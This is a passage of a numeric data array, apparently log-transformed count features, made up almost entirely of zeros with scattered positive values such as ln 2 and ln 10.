0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.442417710521793, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.302585092994046, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, \n 1.7412592803704001, 0.0, 0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 3.713572066704308, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 2.1972245773362196, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.58351893845611, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 2.70805020110221, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.4825185607408002, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 9.129638369467537, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.550898738446989, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 4.1588830833596715, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, \n 3.295836866004329, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 4.04305126783455, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 3.0841946160253872, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 6.5667131767661875, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, \n 0.0, 0, 0, 0, 4.31748811353631, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 6.578517662373903, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0, 3.5263605246161616, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 1.9459101490553132, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 8.221747728346623, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0, 0.0, 0.0, \n 3.367295829986474, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 4.574710978503383, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.1588830833596715,\n 1.3862943611198906, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 3.7612001156935624, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.605170185988092, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 2.302585092994046, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.9459101490553132, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 3.1354942159291497, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8501476017100584, \n 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 3.4965075614664802, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, \n 4.394449154672439, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.952096120109145, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 8.384291749700655, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0,\n 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.2237778411112, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 3.7612001156935624, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 5.575949103146317, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.290459441148391, 0,\n 0.0, 0, 0.0, 0, 0.0, 2.0794415416798357, 0, 3.800574088041945, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.0794415416798357, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.6931471805599453, 0.0, 3.0910424533583156, 0.0, 0.0, 0.0, 0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 